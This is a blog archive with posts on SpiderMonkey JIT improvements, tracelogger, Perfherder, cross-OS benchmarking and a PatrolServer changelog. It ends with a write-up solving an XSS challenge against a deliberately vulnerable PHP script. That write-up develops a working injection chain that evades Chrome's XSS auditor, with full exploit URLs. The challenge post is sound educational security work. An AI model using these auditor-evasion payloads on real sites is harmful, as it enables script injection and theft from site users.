SpiderMonkey JIT improvements in FF53

On the 23rd of January the code of Firefox 53 was merged into the stabilization tree. While we work on the next release, the code of FF53 has time to stabilize before its release on April 18th.

A lot has happened in FF53. Narrowing down to the JITs, the following was committed:

CacheIR

CacheIR improved drastically in this release. The goal of this project is twofold. The first part is to unify the inline cache (IC) stubs in Baseline and IonMonkey; as a result we only have to implement a new stub once, leading to less code duplication. The second part is to use an intermediate representation, allowing us to reuse parts between stubs.

Starting in this release, IonMonkey uses this infrastructure for generating ICs. New ICs were also ported, and we now have complete coverage of JSOP_GETPROP (e.g. reading obj.prop where obj is an object) and JSOP_GETELEM (e.g. reading array[42]) in CacheIR. Besides this milestone, inline caches were added for getting DOM expando properties (i.e. properties added on DOM objects), for getting own properties of expandos on DOM proxies, and for lookups of plain data properties on WindowProxies.
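
To make the covered cases concrete, here is an illustrative sketch (the names are mine) of the kinds of JavaScript accesses these ICs now handle:

var obj = { prop: 1 }, array = [1, 2, 3];
obj.prop           // JSOP_GETPROP: named property read on an object
array[2]           // JSOP_GETELEM: indexed element read
document.myExpando // expando property added on a DOM object (browser only)
window.someGlobal  // plain data property lookup through the WindowProxy (browser only)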

Our regular contributor evilpie helped a lot with this effort and implemented a logger that shows when specific stubs are missing. This allowed us to find missing edge cases on popular websites, enabling optimizations notably on Google Docs and Twitter. This work will continue in FF54.

WebAssembly

Since we implemented the draft specification of WebAssembly, we haven’t stopped improving it, be it for throughput or for compilation time, and we have been polishing our implementation to fix bugs and incorporate last-minute spec changes.

In order to improve the experience we have moved validation to a helper thread and we are doing more of the compilation in parallel. Lastly, we added some optimizations to achieve better parallelism while compiling. As a result the compilation of WebAssembly code should be smoother.
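
As an illustration, here is a minimal sketch of the asynchronous API this work speeds up. The bytes below are just the 8-byte header of an empty module; a real application would fetch() its .wasm file instead:

var bytes = new Uint8Array([0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00]); // "\0asm" magic + version: a valid, empty module
WebAssembly.compile(bytes)                     // validation and compilation can happen on helper threads
  .then(function (module) { return WebAssembly.instantiate(module); })
  .then(function (instance) { console.log("module ready", instance); });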

IonMonkey

IonMonkey also got its fair share of improvements in this release.

On Google Docs we noticed that a lot of compilation time was spent in one particular function, FlagAllOperandsAsHavingRemovedUses. We were able to decrease the time spent in the loop in that function by removing some redundant checks. As a result it is now a very tight loop and no longer visible in profiles.

We adjusted a part of our engine, IonBuilder, whose job is to create an SSA graph from a JS script, to return a “Result” type. This annotation makes it easier to differentiate between different kinds of failures and to act on them correctly. It already pointed out places where we didn’t handle out-of-memory failures correctly. In the future it will also allow us to backtrack after an inlining failure and continue compiling without having to start over.

Another improvement to IonBuilder is that we now split the creation of the Control Flow Graph (CFG) from the rest of what IonBuilder does. IonBuilder has a lot of different roles, and as a result the code could be cleaner. This code is also one of the few parts that cannot run on a background thread. The split simplifies the IonBuilder code a bit and allows us to cache the CFG, so a recompilation should be a little bit faster now.

Taahir Ahmed added extra code that allows us to constant-fold powers. IonMonkey can now compute the result of a power with constant operands at compile time, instead of executing it every time at runtime.
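
A hypothetical example of the pattern that benefits:

function scaled(x) {
  // Both operands are constants, so IonMonkey can fold Math.pow(2, 10)
  // to 1024 at compile time instead of computing the power on every call.
  return Math.pow(2, 10) * x;
}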

Addition to the team

I’m also happy to announce that Ted Campbell has joined the JIT team. He started on January 9th and is located in the Toronto office. He is helping with the CacheIR project and will also look into making new ECMAScript 2016 features faster in IonMonkey.

Closing notes

This is not a full list of the changes that happened, but it should cover the big ones. If you want the full list I would recommend reading the bug list. I want to thank everybody for their hard work. If you are interested in helping out, we have a list of mentored bugs at bugsahoy, or you can contact me (h4writer) online at irc.mozilla.org #jsapi.

SpiderMonkey JIT improvements in FF52

Last week we signed off on our hard work on FF52 and started working on FF53. The expected release date of this version is the 6th of March. In the meantime we still have time to stabilize the code and fix issues that we encounter.

A lot of important work was done in the JavaScript JIT engine.

WebAssembly has made great advances. We have fully implemented the draft specification and are requesting final feedback as part of a cross-browser Browser Preview in the W3C WebAssembly Community Group. Assuming the Browser Preview concludes without major changes before 52 is released, we’ll enable WebAssembly by default in 52.

Step by step our CacheIR infrastructure is improving. In this release, getprop on primitive values was ported to the CacheIR infrastructure.
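
In other words, property reads off primitive values, such as (my examples):

"foo".length    // getprop on a string primitive
(123).toString  // getprop on a number primitive
true.valueOf    // getprop on a boolean primitive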

GC sometimes needs to discard the compilations happening on the helper threads. Previously we waited for the compilations to stop one after another, so it could take a while until all compilations were discarded. Now we signal all threads at the same time to stop compiling and then wait for all of them to finish. This was a major win in our effort to make sure GC doesn’t interrupt execution for too long.

The register allocator also received a nice improvement. Sometimes we were adding spills (moves between the stack and registers) when they were not needed. A fix was added to combat this.

As in every release, a long list of differential bugs and crashes has been fixed as well.

This release also includes code from contributors:

  • Emanuel Hoogeveen improved our crash annotations. He noticed that we didn’t save the crash reason in our crash reports when using “MOZ_CRASH”.
  • Tooru Fujisawa has been doing incredible work throughout the codebase.
  • Johannes Schulte has landed a patch that improves the generated code for “testArg ? testArg : 0.0” and also eliminates needless control flow (see the sketch after this list).
  • Sander Mathijs van Veen made sure we can use an unsigned integer modulo instead of a double modulo operation, and he also added code to fold additions with multiple constants.
  • André Bargull added code to inline String.fromCodePoint in IonMonkey. As a result its performance should now be equal to using String.fromCharCode.
  • Robin Templeton noticed that we were spewing incorrect information in our debug logs and fixed that.
  • Heiher has been updating MIPS to account for all changes we did to platform dependent code for WebAssembly.
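
To make a few of these concrete, here is a hedged sketch of the JS patterns the patches above improve (the function names are mine, purely illustrative):

function coalesce(testArg) {
  return testArg ? testArg : 0.0;  // now compiles to tighter code without needless control flow
}

function mod10(x) {
  return (x >>> 0) % 10;           // unsigned integer modulo instead of a double modulo
}

var s = String.fromCodePoint(65);  // inlined in IonMonkey; now on par with String.fromCharCode(65)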

I want to thank every one of them for their help! They did a tremendous job! If you are interested in helping out, we have a list of mentored bugs at bugsahoy or you can contact me (h4writer) online at irc.mozilla.org #jsapi.

Request for hardware

Update: I want to thank everybody that has offered a way to access such a netbook. We now have access to the needed hardware and are trying to fix the bug as soon as possible! Much appreciated.

Do you have a netbook (from around 2011) with an AMD processor? Please check whether it has a Bobcat processor (C-30, C-50, C-60, C-70, E-240, E-300, E-350, E-450). If you have one and are willing to help us by giving vpn/ssh access, please contact me (hverschore [at] mozilla.com).

Improving stability and decreasing the crash rate is an ongoing effort for all teams at Mozilla. That is also true for the JS team. We have fuzzers abusing our JS engine, we review each other’s code in order to find bugs, we have static analyzers looking at our code, we have best practices, and we look at crash-stats trying to fix the underlying bugs. Lately we have identified a source of crashes in our JIT engine on specific hardware, but we haven’t been able to find a solution yet.

Our understanding of the bug is quite limited, but we know it is related to the generated code. We have tried to introduce some workarounds to fix the issue, but none have worked yet and the turnaround is quite slow: we have to come up with a possible workaround, release it to Nightly, and wait for crash-stats to see whether it fixed anything.

That is the reason for our call for hardware. We don’t have the hardware ourselves, and having access to the correct hardware would make it possible to test potential fixes much more quickly until we find a solution. It would help us a lot.

This is the first time our team has tried to leverage our community in order to find specific hardware, and I hope it works out. We have a backup plan, but we are hoping that somebody reading this can make our lives a little bit easier. We would appreciate it a lot if everybody could check whether they still have a laptop/netbook with a Bobcat AMD processor (C-30, C-50, C-60, C-70, E-240, E-300, E-350, E-450). This processor was used, for example, in the AMD variant of the Asus Eee. If you do, please contact me at (hverschore [at] mozilla.com) in order to discuss a way to access the laptop for a limited time.

Performance improvements to tracelogger

Tracelogger is a tool that creates traces of the JS engine to investigate or visualize performance issues in SpiderMonkey. Steve Fink has recently been using it to dive into Google Docs performance and has been hitting some roadblocks: the UI became unresponsive and crashing the browser wasn’t uncommon. This is unacceptable and it urged me to improve the performance!

Crash

I looked at the generated log files, which were not unacceptably large. The log itself contained 3 million logged items, while I have been able to visualize 12 million logged items before. So the sheer number of logged items was not the cause. I knew that creating the fancy graphs was also not the problem; they have been optimized quite heavily already. That only left the overview as a possible culprit.

The overview pane gives an overview of the engines/subsystems we spend time in. Beneath it we see the same, but per script. This computation runs in a web worker so as not to make the browser unresponsive. Once in a while the worker hands back a partial result, which the browser renders.

The issue was in the rendering of the partial result. We update this table every time the worker finishes a chunk. Generating the table is generally fast for the workloads I was testing, since there weren’t a lot of different scripts. Running the full browser, however, produces a lot of different scripts, so updating the table became a big overhead. Keep in mind that this could happen every millisecond.

The first fix was to make sure we only update this table every 100 ms. This is a nice trade-off between seeing the newest information and not making the browser unresponsive. It resulted in far fewer calls to update the table, up to 100x fewer.
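
A minimal sketch of that kind of throttling, assuming a worker posting partial results and a hypothetical updateTable() renderer:

var lastUpdate = 0;
worker.onmessage = function (event) {
  var now = performance.now();
  if (now - lastUpdate < 100)  // skip partial results arriving within 100 ms of the last render
    return;
  lastUpdate = now;
  updateTable(event.data);     // hypothetical: rebuild the overview table from the partial result
};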

The next thing I did was to delay the creation of the table. Instead of creating a table, the UI now shows a textual representation of the data. Only when the computation is complete will it show the sortable table. This was 10x to 100x faster.

Screenshot of tracelogger

In most cases the UI can now generate the temporary view in 1 ms. Still, I didn’t want to take any chances: if generating the temporary view takes longer than 100 ms, the UI stops live-updating the temporary view and only shows the result when finished.

Lastly I also fixed a memory issue. A tracelogger log is a tree of where time is spent, and it is parsed breadth-first. That is preferable, since it gives a quite good representation quite quickly, even if all the small logged items haven’t been processed yet. But it means the UI needs to keep track of which items to process in the next round, and this list of items could get unwieldy. This is now solved by switching to depth-first traversal when that happens; depth-first traversal needs no additional state to traverse the tree. In my test case memory usage previously grew to 2 GB before crashing. With this change the maximum memory use I saw was 1.2 GB, and no crash.
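
A sketch of the idea (not the actual tracelogger code; process() stands in for the per-item work, and nodes are assumed to have a children array):

function process(node) { /* accumulate timings for this logged item */ }

function traverse(root, maxQueue) {
  var queue = [root];
  while (queue.length > 0) {
    if (queue.length > maxQueue) {
      // The breadth-first queue grew too large: finish the remaining
      // subtrees depth-first, which needs no additional state.
      queue.forEach(depthFirst);
      return;
    }
    var node = queue.shift();
    process(node);
    queue.push.apply(queue, node.children);  // breadth-first: enqueue the children
  }
}

function depthFirst(node) {
  process(node);
  node.children.forEach(depthFirst);
}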

Everything has landed in the github repo. Everybody using the tracelogger is advised to pull the newest version and experience the improved performance. As always, feel free to report new issues or to contribute to making tracelogger even better.

Tracelogger GUI updates

Tracelogger is one of the tools JIT devs (especially me) use to look into performance issues and to improve the performance of Firefox’s JS engine. It traces which functions are executing, together with extra information like which engine is running, how long compilation took, how many times we are GC’ing, and whether we are calling VM functions.

I made the GUI a bit more powerful. First of all, I moved the computation of the overview to a web worker, which should help the usability of the tool. Next to that, I made it possible to toggle categories on and off, which might make it easier to understand the graphs. I also introduced a settings popup, in which you can now choose to see absolute (CPU ticks) or relative (%) timings.
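
The worker part boils down to something like this sketch (the file name, message shape and renderOverview() are hypothetical):

var worker = new Worker("overview.js");  // hypothetical worker script doing the heavy computation
worker.onmessage = function (event) {
  renderOverview(event.data);            // hypothetical: draw the overview pane on the main thread
};
worker.postMessage(traceData);           // hand the raw trace to the worker, off the main thread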

Screenshot from 2016-05-03 09:36:41

There are still a lot of possible improvements. Eventually it should be possible to zoom in on graphs, toggle scripts on/off, see full times of scripts (instead of self time only), and maybe even show another kind of graph (like a flame chart). Hopefully one day.

This is of course open source and available at:
https://github.com/h4writer/tracelogger/tree/master/website

Perfherder and regression alerts

In the dawn of arewefastyet only 2 machines were running and only three benchmarks were important. At that time it was quite easy to just iterate over the different benchmarks once in a while and spot the regressions. Things have come a long way since. Due to the enormous increase in the number of benchmarks and machines, I created a regression detector, which wasn’t as easy as it sounds. False positives and false negatives are the enemy of such a system. Bimodal benchmarks, noise, compiler perturbations, the amount of data points: none of it helped. This also had low priority, given that I’m supposed to work on improving JIT performance, not on recording it.

Then Perfherder came along, which aims to collect any performance data in a central place and to act on that information, and which has dedicated people working on it. Since the beginning of 2016 AWFY has started to use that system more and more. We have been sending our performance data to Perfherder for a few months now, and Perfherder has been improving to support more and more of the functionality AWFY needs. Switching the regression detection from AWFY to Perfherder is coming closer, which will remove my largest time drain and allow me to focus even more on the JIT compiler!

The alerts Perfherder creates are visible at:
https://treeherder.allizom.org/perf.html#/alerts?status=0&framework=5

Since last week we can request alerts on the subscores of a benchmark, which is quite important for JS benchmarks. Octane has a variance of about 2%, and a subscore that regresses by 10% will only decrease the full benchmark score by about 1%. Such a regression therefore stays within the noise levels and won’t get detected on the full score alone. This week this feature was enabled on AWFY, which will increase the correctness and completeness of the alerts Perfherder creates.
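
A rough back-of-the-envelope check of that claim, assuming (as an approximation) that the overall Octane score is the geometric mean of its 17 subscores:

var scores = [];
for (var i = 0; i < 17; i++)
  scores.push(1000);               // 17 subscores of 1000: overall score 1000
scores[0] = 900;                   // one subscore regresses by 10%
var logSum = scores.reduce(function (sum, s) { return sum + Math.log(s); }, 0);
console.log(Math.exp(logSum / scores.length));  // ~993.8: under a 1% drop, well inside the ~2% noise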

I want to thank Joel Maher and William Lachance for their help with this.

AWFY now comparing across OS

At the end of last year (2015) we had performance numbers comparing Firefox to the other browser vendors in the shell, and in the browser on Windows 8 and Mac OS X, though on different hardware.

This opened requests for better information. We didn’t have any data on whether Firefox on Windows was slower than on other OSes on the same hardware. We also got requests to run Windows 10 and to compare against the Edge browser.

Due to these requests we decided to find a way to run all OSes on the same hardware specification. We ordered three Mac Minis and installed the latest flavors of Windows, Mac OS X and Ubuntu on them. Afterwards we got our AWFY slave running on each machine and started reporting to the same graph.

Compare OS

Finally we have Edge performance numbers. Their new engine is not at all sub-par compared to the other JS engines; it is quite good! Though there are some side notes I need to attach to the numbers above. We cannot state enough that Sunspider is actually obsolete. It was a good benchmark at the start of the JS performance race, but now it is mostly annoying, since it tests the wrong things, not the things you want to or should improve. Next to that, Octane is still a great benchmark, except for mandreel latency. That sub-benchmark is totally wrong, and we notified the v8 team about it, but we have had no response so far (https://github.com/chromium/octane/issues/29). It is quite sad to see our hard work devalued because other vendors game that benchmark.

We also have performance numbers across OSes for the first time. These showed us that our Octane score was lower on Windows. Over the last few months we have been rectifying this. We still see somewhat slower cold performance due to MSVC 2015 being less eager to inline functions, but our JIT performance should be similar across platforms now!

PatrolServer 1.0.1

We at PatrolServer aim to increase security by decreasing the vulnerability of public servers on the internet. Last week our product PatrolServer was released to the public in an open beta. This tool continuously monitors your server for outdated software and exploits and informs you.

During the last week a lot of people have tried the tool and provided us with vital feedback. We carefully listened to the complaints, suggestions and compliments, and tried to react to all of them. The feedback is greatly appreciated, and we will continue to listen to any information from our early adopters.

In this small timeframe we were able to address some of the comments raised, and we will implement other suggestions in upcoming releases. Keep your feedback flowing!

New Features:

We upgraded the way to submit feedback from within PatrolServer itself by integrating Zendesk. This also has the nice feature that, while we are online, we can chat with the original submitter to request more information or help immediately. Search for help or chat inside the tool.

For the open beta we focused on Linux servers, since that is our domain of expertise and most servers run Linux. During the release we got some feedback asking us to also support ASP.NET, so we added preliminary support for it. The extensiveness of this detection will improve in the future, and IIS is also on the roadmap. Stay tuned while we add Microsoft support.

Improvements:

Some people forget to add any servers or forget to verify their servers. As a result they didn’t get any reports or updates about the vulnerability of their server. To combat this we now send a reminder to everybody who signed up but didn’t add any servers or forgot to verify their server.

The tool has been adjusted to work on mobile phones. Here we must thank the people who reported the issues they had on their phones. We should be fully responsive now!

We also added some extra security measures, like a country lock. That should make your account even safer.

Full changelog:
- Fix PHP error for older PHP versions with the PHP detector
- Initial support for ASP.NET
- Disable sending mails of outdated software to unverified servers.
- Add a priority to scanning of servers
- Fix overlapping content on mobile
- Add hostmaster as potential verification mailer
- Implement Zendesk support in app
- More aggressively detect php
- Add mailer for empty accounts or not verified servers
- Force ssl on login
- Add second cpe name for nginx
- Add outdated debian versions lenny, etch, sarge
- Ubuntu support for lucid ended and for vivid started
- Keep the cron working without overlap
- Add statistics page
- Stress test: add 25.000 scans simultaneously
- Added more information about our company in the footer
- Added support for versions:
 * mysql: 5.5.43-0ubuntu0.14.10.2, 5.5.43-0ubuntu0.14.04.2,
          5.6.19-1~exp1ubuntu2.1, 5.6.19-0ubuntu0.14.04.2,
          5.5.44-0ubuntu0.14.10.1, 5.5.44-0ubuntu0.14.04.1,
          5.5.44-0ubuntu0.12.04.1, 5.6.19-0ubuntu0.14.04.3,
          5.6.25-0ubuntu0.15.04.1     
 * openssl: 1.0.1p, 1.0.2d
 * php: 5.6.11, 5.5.27, 5.4.43, 5.5.12+dfsg-2ubuntu4.6,
        5.5.9+dfsg-1ubuntu4.11, 5.3.10-1ubuntu3.19
 * apache: 2.4.16, 2.2.31
 * nginx: 1.9.3, 1.6.2-5ubuntu3.1

We hope to address your issue soonish,
The PatrolServer team

In the land of XSS ‘possibly safe’ means ‘exploitable’

XSS (or cross-site scripting) is an attack on web applications, where malicious people try to inject data into websites in order to steal sensitive data. Despite efforts to decrease the opportunities for it, it is still one of the most used attacks.

Detectify posted an XSS challenge related to a real case they found. The challenge, called “twins of ten”, checks every input and only allows 10 characters per input. To make the challenge even more fun they also required that the solution works with the Chrome XSS auditor, the tool Chrome uses to combat XSS exploits on the user’s side.

In the challenge one needs to break the following PHP script (which emulates the issue they found):

<?php
$q = urldecode($_SERVER['QUERY_STRING']);
$qs = explode('&', $q);
$qa = array();
$chars = 0;
foreach($qs as $q) {
	$q = explode('=', $q);
	array_shift($q);
	$s = implode('=', $q);
	if(strlen($s) > 10) continue;
	$chars += strlen($s);
	$qa[] = $s;
}
foreach($qa as $q) {
	echo "<0123$q><b x=\"x\">foo</b></0123$q>";
}
echo '<!-- '.$chars.' chars long -->';

In this script the input is checked, but not well enough. The authors thought it would be safe to just make sure each input is at most 10 characters long. Ten characters is awfully little; the reasoning behind this limit is probably that it makes an attack nearly impossible. But if there is one thing we know about hackers, it is that they are perseverant, and a small potential crack is enough to get them interested in finding a way to break it. That also applies to this script, and we are going to prove it!

How can we exploit this?

When we go to the web page we can adjust some of the parameters with arbitrary data. The only constraint is that every value can be at most 10 characters long:

example.php?a={1}&b={2}&c={3}&d={4}…

This request generates the following HTML code. The values are injected into the HTML without any alteration or validation:

<0123{1}><b x="x">foo</b></0123{1}><0123{2}><b x="x">foo</b></0123{2}><0123{3}><b x="x">foo</b></0123{3}><0123{4}><b x="x">foo</b></0123{4}>
...

Our goal is to adjust {1} through {n} to show that we can eventually run arbitrary JavaScript code. For this example we will try to alert something:

<script>alert(1);</script>

Now before going further, I would encourage everybody to think about the issue and try it out. It is a fun brain teaser, especially the part about fooling the Chrome XSS detector. The rest of the post describes a solution I found.

The first thing one needs to do is to get a place within a script tag where we can inject some JavaScript code. In this example there is no script tag present, so we are responsible for injecting one ourselves. Let’s try this by splitting the tags over different inputs. If we set {1} => “><script>” and {2} => “></script>” we get:

<0123><script>><b x="x">foo</b></0123><script>><0123></script>><b x="x">foo</b></0123></script>>

This brings us closer. We injected a script open and close tag; that is already good. Only the code inside the tags is nonsense, so we need to come up with a way to sanitize it. Due to the limit we don’t have a lot of wiggle room. Most languages have something to comment out code, e.g. /*, //, <!--. So let’s have a look if we can use that here:

{1} => "><script>/*"
{2} => "*/</script>"
<0123><script>/*><b x="x">foo</b></0123><script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

This seems to work. We successfully made the code valid by turning the in-between HTML tags into comments. Though we still need to address two things.

1) The first item ({1}) is actually 11 characters, which will fail, since only 10 characters are allowed. Luckily for us we can abuse the system a bit and remove the first ‘>’. Almost all browsers will assume the first <0123 wasn’t actually a tag and that the user forgot to use &lt;.

{1} => "<script>/*"
{2} => "*/</script>"
<0123<script>/*><b x="x">foo</b></0123<script>/*><0123*/</script>><b x="x">foo</b></0123*/</script>>

Which fixes the first issue.

2) Chrome has an XSS auditor in the browser that uses heuristics to detect injected JavaScript code and stop the attack. This measure protects users so that, even if a website is vulnerable, they are still protected. Our example triggers the auditor, and as a result the code in between the tags won’t get executed.

The same happens when trying:

{1} => "<script>//"
{2} => "\n</script>"
<0123<script>//><b x="x">foo</b></0123<script>//><0123
</script>><b x="x">foo</b></0123
</script>>

So the hard part of this challenge was fooling the Chrome auditor. There are a lot of examples of how to fool the auditor, but most are already outdated: Chrome keeps improving the auditor, making it harder every time. But since it is based on heuristics, we might still find a way to fool the browser.

As a result I searched a bit to get more information about the auditor:

The last link even has some examples that still work with the newest Chrome release. I couldn’t use them in my example, but I learned some tricks to fool the auditor. It seems that the content inside the script tag is compared with the provided input, and when a match is found the attack is blocked. It also sometimes doesn’t look at anything behind a “//”. And one needs to make sure that most of the code is actually original code, not related to the parameters.

I had to try a lot of possible inputs that didn’t fool the auditor, had to almost give up a couple of times, tried again, saw the auditor calling my bluff again, and reiterated, before I finally found a snippet that worked.

In order to achieve an attack, I had to fool the auditor into believing the existing code wasn’t removed but was still part of the JavaScript code. That is why comments didn’t work. I found that turning the in-between HTML into unused string literals was a strategy the auditor didn’t detect (yet?):

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123'</script><b x="x">foo</b></0123'</script>

So anything we put in {2} after the newline is JavaScript code that will run. We don’t have much space: we only have 10 characters, and we already use 5 of them to ‘remove’ the extra HTML code. So we have 5 characters to do something. Another issue we need to work around is that every 5 characters we write will get executed twice, since each input value is echoed twice in the generated HTML (once in the opening and once in the closing tag). So we cannot do anything that would be wrong when executed twice. But given those constraints we can repeat {2} multiple times and eventually execute arbitrary code.

{2} => "'\nXXXXX;'+"

There are probably multiple ways to do this. I went with the idea of creating the string “alert”, which is doable in chunks of only 5 characters:

a='a' // 5 chars
l='l' // 5 chars
e='e' // 5 chars
r='r' // 5 chars
t='t' // 5 chars
b=a+l // 5 chars
c=b+e // 5 chars
d=c+r // 5 chars
e=d+t // 5 chars; e now contains "alert"

Now the issue becomes invoking that string. It is possible to use this[e], which returns the alert function given that e contains the string “alert”. That seems good, but we need 6 characters for this:

t=this // 6 chars;
s=t[e] // 6 chars; s now contains the function alert

s(1) // 4 chars; alert(1)!!! 

Here I thought back to why we didn’t use comments instead of strings to hide the existing HTML tags: we wanted to fool the auditor. It turned out that after our first little hack, the third input no longer needs this special format. We had already fooled the auditor, so our third parameter had a little bit more freedom. As a result I could transform the input to:

{3} => "'\nXXXXXX//"

Concretely, with dummy statements foo1 and foo2 standing in for real code:
{1} => "<script>//"
{2} => "'\nfoo1;'+"
{3} => "'\nfoo2//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
foo1;'+><b x="x">foo</b></0123'
foo1;'+><0123'
foo2//><b x="x">foo</b></0123'
foo2//><0123'</script><b x="x">foo</b></0123'</script>

This means we have 6 characters at our disposal, just the amount we needed. There is only one hurdle left: if we run the code with the small chunks listed above, it will alert twice. That is not the intention; we want to alert only once, so we need to remove the first or second occurrence.

I did this by absorbing the first occurrence into the string I used to ‘remove’ the original code.

{1} => "<script>//"
{2} => "'\n;'+"
{3} => "\\\nfoo2;'//"
{4} => "'</script"
<0123<script>//><b x="x">foo</b></0123<script>//><0123'
;'+><b x="x">foo</b></0123'
;'+><0123\
foo2;'//><b x="x">foo</b></0123\
foo2;'//><0123'</script><b x="x">foo</b></0123'</script>

Putting this all together we get the following inputs:

{1}  => "<script>//"
{2}  => "'\na='a';'+"
{3}  => "'\nl='l';'+"
{4}  => "'\ne='e';'+"
{5}  => "'\nr='r';'+"
{6}  => "'\nt='t';'+"
{7}  => "'\nb=a+l;'+"
{8}  => "'\nc=b+e;'+"
{9}  => "'\nd=c+r;'+"
{10} => "'\ne=d+t;'+"
{11} => "'\nt=this//"
{12} => "'\nk=t[e]//"
{13} => "\\\nk(1);'//"
{14} => "'</script"

The PHP script at the beginning of this post can now be compromised just by visiting: example.php?a=<script>%2F%2F&a=%27%0Aa%3D%27a%27%3B%27%2B&a=%27%0Al%3D%27l%27%3B%27%2B&a=%27%0Ae%3D%27e%27%3B%27%2B&a=%27%0Ar%3D%27r%27%3B%27%2B&a=%27%0At%3D%27t%27%3B%27%2B&a=%27%0Ab%3Da%2Bl%3B%27%2B&a=%27%0Ac%3Db%2Be%3B%27%2B&a=%27%0Ad%3Dc%2Br%3B%27%2B&a=%27%0Ae%3Dd%2Bt%3B%27%2B&a=%27%0At%3Dthis%2F%2F&a=%27%0Ak%3Dt%5Be%5D%2F%2F&a=%5C%0Ak%281%29%3B%27%2F%2F&a=%27<%2Fscript

Edit: this isn’t the smallest possible attack. With some tricks it is possible to write up to 7 characters in one go, so it is not actually necessary to create the string “alert” and invoke it through “this”. But the above shows some of the thinking and tricks that can be used to create an attack. The smallest set I found was:

{1}  => "<script>//"
{2}  => "'\n'+"
{3}  => "'\n//"
{4}  => "\ne=alert//"
{5}  => "\\\ne(1);'//"
{6}  => "'</script"

Which yields the following URL: example.php?a=%3Cscript%3E%2F%2F&a=%27%0A%27%2B&a=%27%0A%2F%2F&a=%0Ae%3Dalert%2F%2F&a=%5C%0Ae%281%29%3B%27%2F%2F&a=%27%3C%2Fscript

Feel free to take the challenge and beat my personal record; contact me on twitter at @patrolserver and I will update this post with your record and name, and maybe even buy you a beer ;).